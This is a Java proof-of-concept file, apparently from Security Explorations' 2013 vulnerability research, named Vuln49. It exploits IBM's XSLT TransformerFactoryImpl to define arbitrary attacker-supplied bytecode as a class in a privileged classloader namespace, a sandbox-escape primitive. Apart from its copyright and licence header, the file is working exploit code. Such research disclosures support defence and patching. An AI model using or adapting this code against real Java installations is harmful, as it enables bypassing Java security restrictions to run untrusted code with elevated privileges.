/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* com.ibm.xtq.xslt.jaxp.compiler.TransformerFactoryImpl                      */
/* arbitrary class definition in a privileged classloader namespace           */

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.io.*;
import com.ibm.xtq.xslt.jaxp.compiler.*;
import com.ibm.xtq.xslt.jaxp.*;
import com.ibm.xtq.xslt.drivers.*;
import com.ibm.xtq.common.utils.*;
import com.ibm.xylem.codegen.*;

public class Vuln49 {

 public static Class define_privileged_class(String name,byte[] def) {
  Class res=null;

  try {
   ClassLoader cl=Thread.currentThread().getContextClassLoader();

   XSLTCompilerSettings xcs=new XSLTCompilerSettings();
   XSLTLinkerSettings xls=new XSLTLinkerSettings(xcs);
   CodeGenerationSettings cgs=xls.getCodeGenerationSettings();
   cgs.setTargetLanguage(2);

   XSLTCompiler xc=new XSLTCompiler(xls);
   InputStream is=cl.getResourceAsStream("dummy.xsl");
   xc.compile(is,"DummyTranslet");

   byte bytes[][]=xc.getBytecodes();
   String names[]=xc.getNames();

   bytes[0]=def;
   names[0]=name;

   TransformerFactoryImpl tfi=new TransformerFactoryImpl();
   tfi.setAttribute("http://www.ibm.com/xmlns/prod/xltxe-j/generate_bcel",new Boolean(true));
   TemplatesImpl ti=tfi.createTemplates(xc,name);

   Class ctab[]=ti.getTransletClasses();
   res=ctab[0];
  } catch(Throwable t) {
   t.printStackTrace();
  }

  return res;
 }
}
